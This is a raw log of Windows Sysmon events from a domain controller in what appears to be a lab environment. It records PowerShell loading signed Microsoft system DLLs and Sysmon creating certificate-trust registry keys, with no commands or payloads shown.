734700x800000000000000057346820Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.533{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 12241200x800000000000000057346819Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346818Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057346817Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057346816Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057346815Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346814Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346813Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346812Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346811Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346810Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346809Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346808Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346807Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346806Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346805Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346804Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346803Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057346802Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.517{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 12241200x800000000000000057346801Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346800Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346799Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346798Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346797Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346796Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346795Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346794Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.533{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346793Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346792Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057346791Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.517{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 12241200x800000000000000057346790Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057346789Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057346788Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057346787Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346786Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346785Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346784Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346783Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346782Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346781Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346780Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346779Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057346778Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\atl.dll3.05.2284ATL Module for Windows XP (Unicode)Microsoft (R) Visual C++Microsoft CorporationATL.DLLMD5=C1B73181019C1E1F28F4161B5F198B7F,SHA256=C3678504437D23910C18D3680B05B4E819A2229BDD0E1E0567186C70D814560DtrueMicrosoft WindowsValid 12241200x800000000000000057346777Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346776Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346775Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346774Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346773Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346772Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346771Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346770Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346769Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346768Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346767Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346766Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346765Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346764Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346763Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057346762Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057346761Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057346760Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346759Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346758Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346757Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346756Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346755Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346754Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346753Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346752Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346751Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346750Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057346749Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436trueMicrosoft WindowsValid 12241200x800000000000000057346748Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346747Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346746Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346745Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346744Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346743Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346742Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346741Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346740Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.517{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057346739Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.517{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057346738Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.517{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057346737Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.517{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057346736Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.517{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057346735Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.517{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057346734Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057346733Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:42.502{8B6011A9-5BA2-618E-51F3-04000000F101}7356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 12241200x800000000000000057346732Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:42.502{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057346731Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 